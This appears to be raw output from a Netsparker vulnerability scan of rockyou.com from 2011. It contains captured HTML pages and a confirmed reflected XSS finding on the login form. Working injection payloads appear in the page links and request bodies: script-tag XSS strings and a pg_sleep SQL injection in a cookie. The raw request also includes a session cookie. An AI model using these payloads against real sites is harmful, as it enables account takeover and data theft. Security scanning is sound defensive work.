<a href="/my_stuff.php">My Stuff</a> |
<a href="/featuredartists.php">Browse</a>
</div>
<div style="text-align:right; font-size:9pt; font-family:Arial, Helvetica, sans-serif">
<a href="http://www.rockyou.com/login/">Get a RockYou Account</a> | <a href="/login.php">Sign in Here</a> </div>
<div id="header_banner" style="margin-top:3px; margin-bottom:5px; width:100%; clear:both">
<table width="100%"><tr>
<td width="104px"><a href="/"><img src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" alt="RockYou.com"></a></td>
<td align="right" style="vertical-align:top">
<form method="get" action="/search_main.php">
<table class="search" id="search_box"><tr><td>
<input type="text" name="s_tsearch" size=17 style="border:2px solid #ff6d07"/></td>
<td><input type="submit" value="search" />
</td></tr></table> <input type="hidden" value="1" name="p" /></form>
</td>
</tr></table>
</div>
</div><div class="body">
<div class="musicheader"></div>
<div class="musicbody">
<!-- Music Slideshows -->
<div class="musicobject" style="margin-left:0px"><a href="http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=117242930"><img src="http://cdn.rockyou.com/rockyou.com/browse/music_header_info/zac_brown.jpg" /><br /><img src="http://cdn.rockyou.com/rockyou.com/browse/button.jpg" width="150" height="55" /></a> </div>
<div class="musicobject"><a href="http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=117375614"><img src="http://cdn.rockyou.com/rockyou.com/browse/music_header_info/tila_tequila.jpg" /><br /><img src="http://cdn.rockyou.com/rockyou.com/browse/button.jpg" width="150" height="55" /></a></div>
<div class="musicobject"><a href="http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=114684110"><img src="http://cdn.rockyou.com/rockyou.com/browse/music_header_info/rissy_palmer.jpg" /><br /><img src="http://cdn.rockyou.com/rockyou.com/browse/button.jpg" width="150" height="55" /></a></div>
<div class="musicobject"><a href="http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=105684192"><img src="http://cdn.rockyou.com/rockyou.com/browse/music_header_info/krista.jpg" /><br /><img src="http://cdn.rockyou.com/rockyou.com/browse/button.jpg" width="150" height="55" /></a></div>
<div style="clear:both"></div>
</div>
<div class="musicfooter"></div>
<link href="browse/browse.css" rel="stylesheet" type="text/css">
<div class="tabmenu">
<div class="tabinactive" style="margin-left:0px"><a href="featuredartists.php">Featured Artists</a></div>
<div class="tabactive">Categories</div>
<div class="tabinactive"><a href="viewsearch.php">Tag Search</a></div>
</div>
<div style="clear:both"></div>
<div class="mainheader"></div>
<div class="mainbody">
<h2></h2>
<!-- Category listing -->
<br /><span style="margin-left:2px"><strong>Results</strong> 0-20 </span>
<span style="margin-left:165px"><strong>
Top Ranked</strong> | <a href='?s_pindex=-20&s_sort=views&s_catid='"--></style></script><script>netsparker(0x001BBA)</script>'>Most Viewed</a> | <a href='?s_pindex=-20&s_sort=date&s_catid='"--></style></script><script>netsparker(0x001BBA)</script>'>Most Recent</a></span>
<!-- // Category Listing -->
<div style="clear:both"></div>
</div><div class="mainfooter"></div>
<div class="ads">
<div style="margin-top:20px;width:100%;text-align:center">
<script type="text/javascript"><!--
google_ad_client = "pub-3255760518790512";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_ad_channel = "";
google_color_border = "EAEAEA";
google_color_bg = "EAEAEA";
google_color_link = "FF6C00";
google_color_text = "000000";
google_color_url = "33D02F";
//-->
</script>
<script type="text/javascript"
src=" http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div>
<script type="text/javascript">
ord = window.ord || Math.floor(Math.random()*1E16);
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Sky_RON;sz=160x600;ord=' + ord + '?"><\/script>');
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/Rockyou.com/RockYou_Sky_RON;sz=160x600;ord=123456789?" target="_blank" >
<img src="http://ad.doubleclick.net/ad/Rockyou.com/RockYou_Sky_RON;sz=160x600;ord=123456789?" border="0" alt="" />
</a>
</noscript>
<div style="width:120px;">
<script type="text/javascript">
//<![CDATA[
ord = window.ord || Math.floor(Math.random()*1E16);
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Sky_RON;sz=160x600;ord=' + ord + '?"><\/script>');
//]]>
</script>
<noscript><a href="http://ad.doubleclick.net/jump/Rockyou.com/RockYou_Sky_RON;sz=160x600;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/Rockyou.com/RockYou_Sky_RON;sz=160x600;ord=123456789?" border="0" alt="" /></a></noscript>
</div>
</div>
<br><br>
<div class="tp">
Copyright © 2008 RockYou | <a target="_BLANK" href="/help">FAQ / Help</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-helpspace&url=http%3A%2F%2Fwww.rockyou.com%2Fhelpspace">MySpace Profile Tips</a> | <a target="_BLANK" href="/privacypolicy.php">Privacy</a> | <a href="/tos.php" target=_blank>Terms of Use</a> | <a href="/corp/facebook/ad.php" target="_blank">Facebook Advertisers</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-dev-pub&url=http%3A%2F%2Fwww.rockyouads.com" target="_blank">Facebook Developers</a> | <a href="/corp/about.php" target=_blank>About Us</a></div>
<div class="tp">
| <a href="?lang=en&s_catid='"--></style></script><script>netsparker(0x001BBA)</script>">English</a> | <a href="?lang=zh&s_catid='"--></style></script><script>netsparker(0x001BBA)</script>">中文</a> | <a href="?lang=es&s_catid='"--></style></script><script>netsparker(0x001BBA)</script>">Español | <a href="?lang=pt&s_catid='"--></style></script><script>netsparker(0x001BBA)</script>">Português</a></a>
</div>
<br>
<br>
<script language="javascript">
if (navigator.cookieEnabled && document.cookie.indexOf('AAMBLFLAG=') == -1) {
var blTomorrow = new Date();
blTomorrow.setTime(blTomorrow.getTime() + 86400000);
document.cookie = 'AAMBLFLAG=SET; expires=' + blTomorrow.toGMTString();
if (document.cookie.indexOf('AAMBLFLAG=') > -1)
document.writeln('<iframe src="http://aps.media.adrevolver.com/adrevolver/trace?sip=65" width="0" height="0"></iframe>');
}
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
//_uacct = "UA-95090-2";
//urchinTracker();
_uacct = "UA-95090-1";urchinTracker();
</script>
<!-- Start..
Date: Mon, 18 Apr 2011 22:25:07 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:25:06 GMT; path=/; domain=.rockyou.com,lastlogin=1303165507; expires=Wed, 27-Jul-2011 22:25:07 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:25:07 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=15701 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 4123
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY class=""
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload=""
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<link href="css/browse.css" rel="stylesheet" type="text/css">
<div class="header">
<div style="float:left; font-family:Arial, Helvetica, sans-serif; font-size:16px;">
<a href="/choose_widget.php">Create</a> |
<a href="/my_stuff.php">My Stuff</a> |
<a href="/featuredartists.php">Browse</a>
</div>
<div style="text-align:right; font-size:9pt; font-family:Arial, Helvetica, sans-serif">
<a href="http://www.rockyou.com/login/">Get a RockYou Account</a> | <a href="/login.php">Sign in Here</a> </div>
<div id="header_banner" style="margin-top:3px; margin-bottom:5px; width:100%; clear:both">
<table width="100%"><tr>
<td width="104px"><a href="/"><img src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" alt="RockYou.com"></a></td>
<td align="right" style="vertical-align:top">
<form method="get" action="/search_main.php">
<table class="search" id="search_box"><tr><td>
<input type="text" name="s_tsearch" size=17 style="border:2px solid #ff6d07"/></td>
<td><input type="submit" value="search" />
</td></tr></table> <input type="hidden" value="1" name="p" /></form>
</td>
</tr></table>
</div>
</div><div class="body">
<div class="musicheader"></div>
<div class="musicbody">
<!-- Music Slideshows -->
<div class="musicobject" style="margin-left:0px"><a href="http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=117242930"><img src="http://cdn.rockyou.com/rockyou.com/browse/music_header_info/zac_brown.jpg" /><br /><img src="http://cdn.rockyou.com/rockyou.com/browse/button.jpg" width="150" height="55" /></a> </div>
<div class="musicobject"><a href="http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=117375614"><img src="http://cdn.rockyou.com/rockyou.com/browse/music_header_info/tila_tequila.jpg" /><br /><img src="http://cdn.rockyou.com/rockyou.com/browse/button.jpg" width="150" height="55" /></a></div>
<div class="musicobject"><a href="http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=114684110"><img src="http://cdn.rockyou.com/rockyou.com/browse/music_header_info/rissy_palmer.jpg" /><br /><img src="http://cdn.rockyou.com/rockyou.com/browse/button.jpg" width="150" height="55" /></a></div>
<div class="musicobject"><a href="http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=105684192"><img src="http://cdn.rockyou.com/rockyou.com/browse/music_header_info/krista.jpg" /><br /><img src="http://cdn.rockyou.com/rockyou.com/browse/button.jpg" width="150" height="55" /></a></div>
<div style="clear:both"></div>
</div>
<div class="musicfooter"></div>
<link href="browse/browse.css" rel="stylesheet" type="text/css">
<div class="tabmenu">
<div class="tabinactive" style="margin-left:0px"><a href="featuredartists.php">Featured Artists</a></div>
<div class="tabactive">Categories</div>
<div class="tabinactive"><a href="viewsearch.php">Tag Search</a></div>
</div>
<div style="clear:both"></div>
<div class="mainheader"></div>
<div class="mainbody">
<h2></h2>
<!-- Category listing -->
<br /><span style="margin-left:2px"><strong>Results</strong> 0-20 </span>
<span style="margin-left:165px"><strong>
Top Ranked</strong> | <a href='?s_pindex=-20&s_sort=views&s_catid='"--></style></script><script>netsparker(0x001BBA)</script>'>Most Viewed</a> | <a href='?s_pindex=-20&s_sort=date&s_catid='"--></style></script><script>netsparker(0x001BBA)</script>'>Most Recent</a></span>
<!-- // Category Listing -->
<div style="clear:both"></div>
</div><div class="mainfooter"></div>
<div class="ads">
<div style="margin-top:20px;width:100%;text-align:center">
<script type="text/javascript"><!--
google_ad_client = "pub-3255760518790512";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_ad_channel = "";
google_color_border = "EAEAEA";
google_color_bg = "EAEAEA";
google_color_link = "FF6C00";
google_color_text = "000000";
google_color_url = "33D02F";
//-->
</script>
<script type="text/javascript"
src=" http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div>
<script type="text/javascript">
ord = window.ord || Math.floor(Math.random()*1E16);
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Sky_RON;sz=160x600;ord=' + ord + '?"><\/script>');
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/Rockyou.com/RockYou_Sky_RON;sz=160x600;ord=123456789?" target="_blank" >
<img src="http://ad.doubleclick.net/ad/Rockyou.com/RockYou_Sky_RON;sz=160x600;ord=123456789?" border="0" alt="" />
</a>
</noscript>
<div style="width:120px;">
<script type="text/javascript">
//<![CDATA[
ord = window.ord || Math.floor(Math.random()*1E16);
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Sky_RON;sz=160x600;ord=' + ord + '?"><\/script>');
//]]>
</script>
<noscript><a href="http://ad.doubleclick.net/jump/Rockyou.com/RockYou_Sky_RON;sz=160x600;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/Rockyou.com/RockYou_Sky_RON;sz=160x600;ord=123456789?" border="0" alt="" /></a></noscript>
</div>
</div>
<br><br>
<div class="tp">
Copyright © 2008 RockYou | <a target="_BLANK" href="/help">FAQ / Help</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-helpspace&url=http%3A%2F%2Fwww.rockyou.com%2Fhelpspace">MySpace Profile Tips</a> | <a target="_BLANK" href="/privacypolicy.php">Privacy</a> | <a href="/tos.php" target=_blank>Terms of Use</a> | <a href="/corp/facebook/ad.php" target="_blank">Facebook Advertisers</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-dev-pub&url=http%3A%2F%2Fwww.rockyouads.com" target="_blank">Facebook Developers</a> | <a href="/corp/about.php" target=_blank>About Us</a></div>
<div class="tp">
| <a href="?lang=en&s_catid='"--></style></script><script>netsparker(0x001BBA)</script>">English</a> | <a href="?lang=zh&s_catid='"--></style></script><script>netsparker(0x001BBA)</script>">中文</a> | <a href="?lang=es&s_catid='"--></style></script><script>netsparker(0x001BBA)</script>">Español | <a href="?lang=pt&s_catid='"--></style></script><script>netsparker(0x001BBA)</script>">Português</a></a>
</div>
<br>
<br>
<script language="javascript">
if (navigator.cookieEnabled && document.cookie.indexOf('AAMBLFLAG=') == -1) {
var blTomorrow = new Date();
blTomorrow.setTime(blTomorrow.getTime() + 86400000);
document.cookie = 'AAMBLFLAG=SET; expires=' + blTomorrow.toGMTString();
if (document.cookie.indexOf('AAMBLFLAG=') > -1)
document.writeln('<iframe src="http://aps.media.adrevolver.com/adrevolver/trace?sip=65" width="0" height="0"></iframe>');
}
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
//_uacct = "UA-95090-2";
//urchinTracker();
_uacct = "UA-95090-1";urchinTracker();
</script>
<!-- Start..
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| lang | GET | en |
| birthyear | GET | 3 |
| country | GET | 0 |
| flixster | GET | 3 |
| mode | GET | create |
| pass | GET | 3 |
| postalcode | GET | 3 |
| sex | GET | 3 |
| source | GET | 3 |
| toscheck | GET | 1 |
| user | GET | 3 |
| user | POST | '><script>alert(9)</script> |
| mode | POST | login |
| pass | POST | 3 |
Request
POST /login.php?lang=en&birthyear=3&country=0&flixster=3&mode=create&pass=3&postalcode=3&sex=3&source=3&toscheck=1&user=3 HTTP/1.1
Referer: http://www.rockyou.com/login.php?lang=en&birthyear=&country=0&flixster=&mode=create&pass=&postalcode=&sex=&source=&toscheck=1&user=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303165555; ctid=3; sns_type=rockyou.com; istack=158777336%7Cwww202.rockyou.com%7C%7C158777337%7Cwww202.rockyou.com%7C%7C158777339%7Cwww202.rockyou.com%7C%7C158777341%7Cwww202.rockyou.com%7C%7C158777342%7Cwww202.rockyou.com%7C%7C158777345%7Cwww202.rockyou.com%7C%7C158777346%7Cwww202.rockyou.com%7C%7C158777348%7Cwww202.rockyou.com%7C%7C158777349%7Cwww202.rockyou.com%7C%7C158777351%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--
Content-Length: 67
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
user='%3e%3cscript%3enetsparker(9)%3c%2fscript%3e&mode=login&pass=3
Referer: http://www.rockyou.com/login.php?lang=en&birthyear=&country=0&flixster=&mode=create&pass=&postalcode=&sex=&source=&toscheck=1&user=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303165555; ctid=3; sns_type=rockyou.com; istack=158777336%7Cwww202.rockyou.com%7C%7C158777337%7Cwww202.rockyou.com%7C%7C158777339%7Cwww202.rockyou.com%7C%7C158777341%7Cwww202.rockyou.com%7C%7C158777342%7Cwww202.rockyou.com%7C%7C158777345%7Cwww202.rockyou.com%7C%7C158777346%7Cwww202.rockyou.com%7C%7C158777348%7Cwww202.rockyou.com%7C%7C158777349%7Cwww202.rockyou.com%7C%7C158777351%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--
Content-Length: 67
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
user='%3e%3cscript%3enetsparker(9)%3c%2fscript%3e&mode=login&pass=3
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:25:56 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=-1; expires=Mon, 18-Apr-2011 12:25:56 GMT; path=/; domain=.rockyou.com,lastlogin=1303165556; expires=Wed, 27-Jul-2011 22:25:56 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:25:56 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=96762 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9101
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; 